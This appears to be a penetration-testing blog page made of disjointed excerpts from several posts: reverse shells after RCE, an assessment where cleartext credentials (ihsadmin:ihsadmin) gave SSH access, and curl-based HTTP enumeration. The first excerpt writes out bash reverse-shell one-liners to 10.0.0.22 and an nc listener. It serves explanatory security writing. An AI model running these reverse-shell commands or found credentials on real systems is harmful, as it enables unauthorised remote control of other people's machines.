Context, context, context
Alright, imagine this – you’re on an engagement, find a few vulnerabilities, run a few exploits, and the next thing you know you have Remote Code Execution (RCE). Now, like muscle memory, your next instinct is to get a shell. Running the following is fairly simple:
sh -i >& /dev/tcp/10.0.0.22/4678 0>&1
Then listen in and…
nc -lvnp 4678
... Huh? Sorry, I mean run this, and…
0<&196;exec 196<>/dev/tcp/10.0.0.22/4678; sh <&196 >&196 2>&196
…and…
A while back, after some live music and drinks at Railways, I made my way to another city for pleasant weather, some dubious food, the ever-wakeful seagulls, and ultimately – an assessment.
After playing around for a few days, Jason and I had obtained access to a system which contained cleartext credentials, namely ihsadmin:ihsadmin.
Using these credentials, we were also able to SSH into a management server of sorts. While this was great, there were still several other in-scope servers that we had no access to. After scanning the network for a bit, I found that a couple of these servers ran HTTP services on ports 80, 8008 and 9080.
Javier had a simple shell script he posted to our internal chat a few days ago. Its goal was to pull all the IP ranges for a country from https://ipinfo.io/ in preparation for a footprint (let’s use PL as an example). Given this involved pulling multiple web pages, I was interested to know what the most efficient approach to this in the shell would be. Truthfully, the actual problem, pulling data from the site or gathering BGP routes, didn’t interest me; I wanted to look at how to do mass HTTP enumeration most efficiently with curl.